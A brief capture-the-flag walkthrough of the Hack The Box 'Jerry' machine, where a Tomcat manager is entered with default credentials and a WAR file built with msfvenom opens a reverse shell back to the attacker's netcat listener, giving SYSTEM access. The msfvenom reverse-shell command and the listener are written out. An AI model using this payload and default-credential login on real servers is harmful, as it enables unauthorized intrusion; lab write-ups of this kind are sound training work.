Hackthebox - Jerry
Windows
Nmap
We only have one port open
Port 8080
In the meantime we can try to log in to the Manager. admin password or admin:admin does not work.
We get redirected here, so I tried tomcat with a password of s3cret, and it works
We can now try to upload things here
Let's make a malicious WAR file with msfvenom and upload it
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=1234 -f war > shell.war
We set up a listener
rlwrap nc -lvp 1234
We upload it and deploy it. We can see it here
We get a shell as NT AUTHORITY\SYSTEM right away
If we go to the Administrator's Desktop we have the user and the root flag in the same file
And we are done. Shortest writeup ever I think 😆 😆